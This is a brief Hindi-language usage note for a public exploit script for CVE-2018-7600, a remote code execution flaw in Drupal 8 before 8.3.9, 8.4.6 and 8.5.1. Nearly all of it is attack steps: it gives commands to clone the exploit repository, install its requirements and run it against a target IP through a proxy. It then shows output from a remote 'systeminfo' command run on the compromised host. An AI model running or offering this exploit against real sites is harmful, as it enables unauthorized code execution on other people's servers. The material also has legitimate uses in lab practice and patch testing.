
Drupal 8.x से पहले 8.3.9, 8.4.x से पहले 8.4.6, और 8.5.x से पहले 8.5.1 दूरस्थ हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देता है क्योंकि यह मुद्दा डिफ़ॉल्ट या सामान्य मॉड्यूल कॉन्फ़िगरेशन वाले कई उप-प्रणालियों को प्रभावित करता है।
केवल संस्करण 8 पर काम करता है, 7 पर नहीं।
git clone https://github.com/0xAJ2K/CVE-2018-7600.git
pip3 install -r requirements.txt
python3 CVE-2018-7600.py
python3 CVE-2018-7600.py -u http://172.31.1.27
kali :: /opt/myscripts » ./CVE-2018-7600.py -u http://172.31.1.27 -p http://127.0.0.1:8080
CMD: systeminfo
Host Name: Test
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
<snip>